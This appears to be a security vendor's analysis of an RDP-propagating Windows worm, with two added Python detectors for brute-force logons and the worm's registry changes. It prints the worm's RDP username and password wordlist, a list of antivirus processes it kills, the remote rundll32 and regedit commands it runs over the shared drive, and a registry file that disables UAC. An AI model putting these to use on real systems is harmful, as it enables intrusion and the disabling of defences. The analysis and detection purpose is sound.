This worm uses Remote Desktop Protocol (RDP) for its propagation routines.
To get a one-glance comprehensive view of the behavior of this Worm, refer to the Threat Diagram shown below.

This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It deletes the initially executed copy of itself.
File size: 7,184 bytes
File type: DLL
Memory resident: Yes
Initial samples received date: 30 Aug 2011
Payload: Terminates processes
Arrival Details
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It may be dropped by the following malware:
Installation
This worm drops the following copies of itself into the affected system:
- %Windows%\clb.dll
- %Windows%\Offline Web Pages\cache.txt
(Note: %Windows% is the Windows folder, which is usually C:\Windows or C:\WINNT.)
It drops the following file(s)/component(s):
(Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:\Windows\System32 on Windows XP and Server 2003.)
It drops the following non-malicious file:
- %Windows%\Offline Web Pages\%yyyy-mm-dd%
(Note: %Windows% is the Windows folder, which is usually C:\Windows or C:\WINNT.)
It injects itself into the following processes as part of its memory residency routine:
Other System Modifications
This worm adds the following registry entries as part of its installation routine:
HKEY_LOCAL_MACHINE\SYSTEM\WPA
it = "{hex values}"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
id = "1293D1C15VAVUJTN"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
ie = "%current folder%\{malware name}.exe"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
md = "{garbage code}"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
sn = "6to4"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
sr = "Sens"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows
NoPopUpsOnBoot = "1"
Process Termination
This worm terminates processes or services that contain any of the following strings if found running in the affected system's memory:
- ACAAS
- ArcaConfSV
- AvastSvc
- FPAVServer
- FortiScand
- GDFwSvc
- K7RTScan
- KVSrvXP
- MPSvc
- MsMpEng
- NSESVC.EXE
- PavFnSvr
- RavMonD
- SavService
- SpySweeper
- Vba32Ldr
- a2service
- avgwdsvc
- avpmapp
- ccSvcHst
- cmdagent
- coreServiceShell
- freshclam
- fsdfwd
- knsdave
- kxescore
- mcshield
- scanwscs
- vsserv
Other Details
This worm deletes the initially executed copy of itself.
NOTES:
This worm creates a backup copy of its dropped file as %Windows%\clb.dll.bak.
The file %System%\clb.dll is a legitimate file used by regedit.exe. The malware places its copy in the %Windows% directory, where regedit.exe itself resides, so that regedit.exe finds the dropped file before the legitimate component in %System% and loads the malicious clb.dll into the system.
It checks port 3389/TCP, the port used by RDP, to find hosts with Remote Desktop enabled.
This worm searches for Remote Desktop servers and tries to log in to them using the following usernames:
- actuser
- admin
- admin1
- admin123
- admin2
- administrator
- aspnet
- backup
- computer
- console
- david
- dragon
- guest
- owner
- princess
- server
- support
- support_388945a0
- test1
- test2
- test3
- user1
- user2
- user3
- user4
- user5
It also tries the following passwords:
- !@#$%
- $1234
- %u%111111
- %u%12
- %u%123
- %u%1234
- %u%123456
- 000000
- 111111
- 1111111
- 111222
- 112233
- 11223344
- 121212
- 123123
- 123321
- 12344321
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- 1234qwer
- 1314520
- 159357
- 168168
- 1q2w3e
- 1qaz2wsx
- 22222222
- 31415926
- 520520
- 654321
- 666666
- 7777777
- 77777777
- 789456
- 888888
- 88888888
- 987654
- 987654321
- 999999
- 1234
- PASSWORD
- Password
- Z1234
- abc123
- abcd1234
- actuser
- admin
- admin1
- admin123
- admin2
- administrator
- aspnet
- backup
- computer
- console
- david
- dragon
- guest
- iloveyou
- letmein
- owner
- password
- princess
- qazwsx
- rockyou
- secret
- server
- super
- support
- support_388945a0
- test1
- test2
- test3
- user1
- user2
- user3
- user4
- user5
- zxcvbnm
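On the targeted host, the logon attempts described above leave Windows Security events (ID 4625 for a failed logon, 4624 for a successful one, LogonType 10 for a RemoteInteractive/RDP session). The following Python script is an added example, not part of this write-up or any vendor tool: it parses constructed sample records written in a simplified key=value line format (not real event-log output; the field names mirror those of event 4625), counts failed RDP logons per source address inside a sliding window, counts the distinct accounts tried, matches them against the worm's username dictionary, and reports a success that follows a burst of failures. The thresholds and the sample addresses are assumptions.

```python
"""Added example: flag RDP password guessing against a host from Windows
Security events (4625 = failed logon, 4624 = successful logon;
LogonType 10 = RemoteInteractive, i.e. an RDP session)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Usernames from the worm's dictionary listed on this page.
WORM_USERNAMES = {
    "actuser", "admin", "admin1", "admin123", "admin2", "administrator",
    "aspnet", "backup", "computer", "console", "david", "dragon", "guest",
    "owner", "princess", "server", "support", "support_388945a0",
    "test1", "test2", "test3", "user1", "user2", "user3", "user4", "user5",
}

# Constructed sample records in a simplified key=value line format (not real
# event-log output). 10.0.0.5 cycles through the worm's dictionary and finally
# succeeds as "backup"; 10.0.0.9 is a user mistyping a password twice.
SAMPLE_LOG = """\
2011-08-30T10:00:01 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=10.0.0.5
2011-08-30T10:00:02 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=10.0.0.5
2011-08-30T10:00:03 EventID=4625 LogonType=10 TargetUserName=guest IpAddress=10.0.0.5
2011-08-30T10:00:04 EventID=4625 LogonType=10 TargetUserName=support IpAddress=10.0.0.5
2011-08-30T10:00:05 EventID=4625 LogonType=10 TargetUserName=test1 IpAddress=10.0.0.5
2011-08-30T10:00:06 EventID=4625 LogonType=10 TargetUserName=user1 IpAddress=10.0.0.5
2011-08-30T10:00:07 EventID=4625 LogonType=10 TargetUserName=backup IpAddress=10.0.0.5
2011-08-30T10:00:08 EventID=4624 LogonType=10 TargetUserName=backup IpAddress=10.0.0.5
2011-08-30T10:01:00 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=10.0.0.9
2011-08-30T10:01:30 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=10.0.0.9
2011-08-30T10:01:45 EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=10.0.0.9
2011-08-30T11:30:00 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=10.0.0.5
"""


def parse_events(text):
    """Turn the sample lines into dicts with typed fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, *pairs = line.split()
        fields = dict(p.split("=", 1) for p in pairs)
        events.append({
            "time": datetime.fromisoformat(stamp),
            "event_id": int(fields["EventID"]),
            "logon_type": int(fields["LogonType"]),
            "user": fields["TargetUserName"].lower(),
            "src": fields["IpAddress"],
        })
    return events


def detect_rdp_bruteforce(events, window=timedelta(minutes=5),
                          min_failures=5, min_users=3, logon_types=(10,)):
    """Return {source_ip: summary} for sources whose failed RDP logons reach
    `min_failures` inside any `window` and span at least `min_users` accounts.
    Thresholds are assumptions to tune per environment. With Network Level
    Authentication enabled, RDP failures are recorded with LogonType 3, so
    add 3 to `logon_types` on such hosts."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        if e["logon_type"] not in logon_types:
            continue
        if e["event_id"] == 4625:
            failures[e["src"]].append(e)
        elif e["event_id"] == 4624:
            successes[e["src"]].append(e)

    alerts = {}
    for src, evs in failures.items():
        evs.sort(key=lambda e: e["time"])
        # Sliding window: the largest number of failures inside any `window`.
        peak, start = 0, 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        users = {e["user"] for e in evs}
        if peak < min_failures or len(users) < min_users:
            continue
        first_failure = evs[0]["time"]
        # A successful logon after the guessing started means a password fell.
        landed = {s["user"] for s in successes.get(src, [])
                  if s["time"] > first_failure}
        alerts[src] = {
            "peak_failures": peak,
            "distinct_users": len(users),
            "wordlist_hits": len(users & WORM_USERNAMES),
            "success_after_failures": sorted(landed),
        }
    return alerts


if __name__ == "__main__":
    for src, info in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(src, info)
```

Only 10.0.0.5 is reported: seven distinct dictionary accounts in seven seconds, followed by a successful logon as "backup", which is the case that should be escalated rather than merely rate-limited. The lone later failure from the same source does not extend the window, and the two mistyped logons from 10.0.0.9 stay below both thresholds.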
Once remotely connected, this worm copies the file %Windows%\clb.dll as a.dll to a temporary drive A: that is shared into the session (\\tsclient\a) and runs it using the following remote command:
- rundll32 \\tsclient\a\a.dll a
It also creates r.reg in the same path and imports it with the remote command regedit /s \\tsclient\a\r.reg. The file has the following contents:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
ConsentPromptBehaviorAdmin=0
EnableLUA=0
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
c:\\windows\\system32\\rundll32.exe=RUNASADMIN
d:\\windows\\system32\\rundll32.exe=RUNASADMIN
e:\\windows\\system32\\rundll32.exe=RUNASADMIN
f:\\windows\\system32\\rundll32.exe=RUNASADMIN
g:\\windows\\system32\\rundll32.exe=RUNASADMIN
h:\\windows\\system32\\rundll32.exe=RUNASADMIN
i:\\windows\\system32\\rundll32.exe=RUNASADMIN
c:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
d:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
e:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
f:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
g:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
h:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
i:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
c:\\winnt\\system32\\rundll32.exe=RUNASADMIN
c:\\win2008\\system32\\rundll32.exe=RUNASADMIN
c:\\win2k8\\system32\\rundll32.exe=RUNASADMIN
c:\\win7\\system32\\rundll32.exe=RUNASADMIN
c:\\windows7\\system32\\rundll32.exe=RUNASADMIN
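The registry changes this worm makes, both the installation entries under HKEY_LOCAL_MACHINE\SYSTEM\WPA listed earlier and the r.reg contents above, can be checked for in exported registry data. The following Python script is an added example, not part of this write-up or any vendor tool. It parses .reg text (the quoted form regedit writes as well as the bare name=value form shown above) and flags UAC being disabled, the no-prompt elevation setting, rundll32.exe entries forced to RUNASADMIN through AppCompatFlags\Layers, the value names the worm adds under WPA, and NoPopUpsOnBoot. The sample text is constructed from the entries on this page (a subset of the Layers lines, and the page's own placeholder for ie) plus one benign compatibility-layer entry for an assumed legacy.exe, included to show that ordinary shims do not fire.

```python
"""Added example: flag the registry modifications described on this page in
exported .reg text (e.g. the output of `reg export`)."""
from collections import defaultdict

# Constructed sample .reg text: the r.reg contents listed above (a subset of
# the AppCompatFlags\Layers entries), the installation entries under
# HKLM\SYSTEM\WPA, and one benign Layers entry (legacy.exe, assumed).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000000
"EnableLUA"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"c:\\winnt\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win7\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\program files\\legacyapp\\legacy.exe"="WINXPSP3"

[HKEY_LOCAL_MACHINE\SYSTEM\WPA]
"id"="1293D1C15VAVUJTN"
"ie"="%current folder%\\{malware name}.exe"
"sn"="6to4"
"sr"="Sens"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows]
"NoPopUpsOnBoot"=dword:00000001
"""

POLICY_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system"
LAYERS_KEY = r"hkey_current_user\software\microsoft\windows nt\currentversion\appcompatflags\layers"
WPA_KEY = r"hkey_local_machine\system\wpa"
BOOT_KEY = r"hkey_local_machine\system\currentcontrolset\control\windows"
# Value names the worm adds under HKLM\SYSTEM\WPA (from this page).
WPA_MARKERS = {"it", "id", "ie", "md", "sn", "sr"}


def _unquote(s):
    """Strip surrounding quotes and undo .reg string escaping (\\\\ and \\")."""
    s = s.strip()
    if len(s) >= 2 and s[0] == '"' and s[-1] == '"':
        s = s[1:-1]
    return s.replace('\\\\', '\\').replace('\\"', '"')


def parse_reg(text):
    """Parse .reg text into {key: {name: value}} with lower-cased keys and
    names. dword values become ints; everything else stays a string."""
    hives, current = defaultdict(dict), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            continue
        if current is None or "=" not in line:
            continue
        name, value = line.split("=", 1)
        if value.strip().lower().startswith("dword:"):
            value = int(value.strip()[6:], 16)
        else:
            value = _unquote(value)
        hives[current][_unquote(name).lower()] = value
    return dict(hives)


def _as_int(value):
    """Accept both parsed dword ints and bare decimal strings such as "0"."""
    if value is None or isinstance(value, int):
        return value
    try:
        return int(str(value).strip(), 10)
    except ValueError:
        return None


def check_indicators(hives):
    """Return a list of (rule_id, detail) findings for the page's indicators."""
    findings = []
    policy = hives.get(POLICY_KEY, {})
    if _as_int(policy.get("enablelua")) == 0:
        findings.append(("uac_disabled", "EnableLUA=0 under Policies\\System"))
    if _as_int(policy.get("consentpromptbehavioradmin")) == 0:
        findings.append(("uac_no_prompt", "ConsentPromptBehaviorAdmin=0 under Policies\\System"))
    for path, layer in hives.get(LAYERS_KEY, {}).items():
        if path.endswith("rundll32.exe") and "runasadmin" in str(layer).lower():
            findings.append(("rundll32_runasadmin", path))
    wpa_hits = sorted(WPA_MARKERS & set(hives.get(WPA_KEY, {})))
    if wpa_hits:
        findings.append(("wpa_markers", ",".join(wpa_hits)))
    if _as_int(hives.get(BOOT_KEY, {}).get("nopopupsonboot")) == 1:
        findings.append(("nopopupsonboot", "NoPopUpsOnBoot=1 under Control\\Windows"))
    return findings


if __name__ == "__main__":
    for rule, detail in check_indicators(parse_reg(SAMPLE_REG)):
        print(f"{rule}: {detail}")
```

Any one of these findings on a host that should have UAC enabled is worth a look on its own; the WPA value names and the rundll32.exe layer entries together are specific to this worm's installation and the session it opens on a guessed-in host.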
This worm downloads an updated copy of itself from http://%domain%/160.rar, where %domain% is one of the following:
- {BLOCKED}r.{BLOCKED}o.be
- {BLOCKED}r.{BLOCKED}o.cc
- {BLOCKED}r.info
- {BLOCKED}r.net
- {BLOCKED}l.{BLOCKED}o.be
- {BLOCKED}l.{BLOCKED}o.cc
- {BLOCKED}l.net
- {BLOCKED}0.{BLOCKED}.38.82